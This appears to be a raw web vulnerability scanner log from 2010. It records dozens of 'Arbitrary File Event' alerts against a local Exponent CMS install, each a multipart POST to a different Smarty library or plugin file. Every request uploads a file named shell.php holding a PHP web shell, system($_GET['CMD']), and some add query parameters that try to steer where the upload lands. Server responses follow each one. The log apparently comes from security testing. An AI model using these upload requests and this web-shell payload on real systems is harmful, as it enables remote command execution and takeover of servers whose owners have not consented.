Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/Config_File.class.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:30 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/Smarty.class.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:30 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/Smarty_Compiler.class.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:30 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 169 Content-Type: text/html
Fatal error: Class 'Smarty' not found in C:\xampp\xampplite\htdocs\exponent\external\Smarty\libs\Smarty_Compiler.class.php on line 35
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/block.textformat.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:30 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/compiler.assign.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:30 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.assign_debug_info.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:31 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.config_load.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:31 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.counter.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:31 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.cycle.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:31 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.debug.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:31 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.eval.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:32 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.fetch.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:32 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.html_checkboxes.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:32 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.html_image.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:32 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.html_image.php?ajax_action=shell.php&expid=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:33 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.html_options.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:33 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.html_radios.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:33 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.html_select_date.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:33 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.html_select_time.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:33 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.html_select_time.php?ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:34 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.html_table.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:34 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.mailto.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:34 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.math.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:34 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.popup.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:34 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.popup_init.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:35 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.popup_init.php?action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:35 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/function.popup_init.php?action=shell.php§ion=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:35 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.capitalize.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:35 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.cat.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:35 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.count_characters.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:36 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.count_characters.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:36 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.count_paragraphs.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:36 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.count_sentences.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:36 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.count_words.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html 